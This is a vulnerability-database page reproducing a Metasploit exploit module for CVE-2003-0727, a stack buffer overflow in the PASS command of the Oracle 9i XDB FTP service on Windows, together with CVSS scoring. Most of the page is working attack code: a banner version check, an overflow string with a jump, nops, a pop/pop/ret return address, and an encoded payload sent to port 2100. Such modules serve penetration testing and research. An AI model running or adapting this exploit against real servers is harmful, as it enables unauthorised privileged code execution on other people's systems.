Lucene search

K
metasploitMC <[email protected]>MSF:EXPLOIT-WINDOWS-FTP-ORACLE9I_XDB_FTP_PASS-
HistoryNov 25, 2005 - 4:11 a.m.

Oracle 9i XDB FTP PASS Overflow (win32)

2005-11-2504:11:22
www.rapid7.com
8

CVSS2

2.1

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:L/AC:L/Au:N/C:N/I:N/A:P

By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on “Variations in exploit methods between Linux and Windows” presented at the Blackhat conference.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
      'Description'    => %q{
          By passing an overly long string to the PASS command, a
        stack based buffer overflow occurs. David Litchfield, has
        illustrated multiple vulnerabilities in the Oracle 9i XML
        Database (XDB), during a seminar on "Variations in exploit
        methods between Linux and Windows" presented at the Blackhat
        conference.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0727'],
          [ 'OSVDB', '2449'],
          [ 'BID', '8375'],
          [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'      => %w{ win },
      'Targets'        =>
        [
          [
            'Oracle 9.2.0.1 Universal',
            {
                  'Platform' => 'win',
                  'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
            },
          ],
        ],
      'DisclosureDate' => '2003-08-18',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(2100),])
    deregister_options('FTPUSER', 'FTPPASS')
  end


  def check
    connect
    disconnect
    if (banner =~ /9\.2\.0\.1\.0/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    user   = rand_text_alpha_upper(10)
    sploit =  rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)
    sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded

    print_status("Trying target #{target.name}...")

    send_cmd( ['USER', user], true )
    send_cmd( ['PASS', sploit], false )

    handler
    disconnect
  end
end

CVSS2

2.1

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:L/AC:L/Au:N/C:N/I:N/A:P